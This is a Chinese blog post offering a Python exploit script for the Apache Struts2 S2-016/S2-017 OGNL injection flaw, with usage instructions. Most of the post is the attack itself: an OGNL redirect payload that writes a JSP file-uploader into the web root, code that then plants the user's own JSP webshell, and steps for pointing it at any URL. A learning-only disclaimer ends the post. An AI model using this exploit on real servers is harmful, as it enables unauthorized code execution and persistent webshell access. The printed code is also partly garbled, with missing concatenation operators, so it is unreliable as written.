struts2 S2-016/S2-017 Python GetShell
之前在看PHP,要给协会写一个CTF,偶然看到乌云上发的最新struts2漏洞以及getshell,jsp我基本上也看不懂。折腾了一下,发现挺有意思,于是写一个python的脚本来自动化getshell吧~
……不知不觉已经快3点了……
代码语言:javascript复制#coding : utf-8
__author__ = 'Phtih0n'
import requests, sys, urllib
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11'}
def GetHost(url):
(type, rest) = urllib.splittype(url)
(host, rest) = urllib.splithost(rest)
return (type "://" host "/")
def UpData(url):
ma = file("shell.jsp")
str = ma.read()
param = {}
param['f'] = 'bakup.jsp'
param['t'] = str
r = requests.post(url "phithon.jsp", data=param, headers=headers)
r = requests.get(url param['f'], headers=headers, allow_redirects=False)
if 200 == r.status_code:
print "success"
print "shell : " url param['f']
else:
print "fail"
def GetShell(url):
test = url r'''/Struts2/test.action?redirect:${#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#p=(#req.getRealPath("/")+"phithon.jsp").replaceAll("\\", "/"),new java.io.BufferedWriter(new java.io.FileWriter(#p)).append(#req.getParameter("c")).close()}&c=<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>'''
r = requests.get(test, headers = headers )
url = GetHost(url)
r = requests.get(url "phithon.jsp", headers = headers)
if r.status_code == 200:
UpData(url)
else:
print "fail"
try:
url = sys.argv[1]
except:
print "usage : %s url" % sys.argv[0]
GetShell(url)
#/Struts2/test.action?redirect:${#w=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),#w.println('[phithon]'),#w.flush(),#w.close()}使用条件及方法:
1.python安装requests库,此处有安装方法:https://cloud.tencent.com/developer/article/1719025
2.将自己的jsp webshell改名为"shell.jsp",放在同一个目录下
3.使用方法:UseOfStruts.py http://xxxx/ 即可:
一般jsp权限挺大的,只要拿到webshell,一般就是管理员之类的:
不多说了,大家继续发挥折腾吧~我睡了……
我把源文件及我使用的jsp webshell打包发附件了。
最后说明,代码只用作学习,请不要作为攻击手段测试国内网站。
附件:Py Struts Getshell.zip
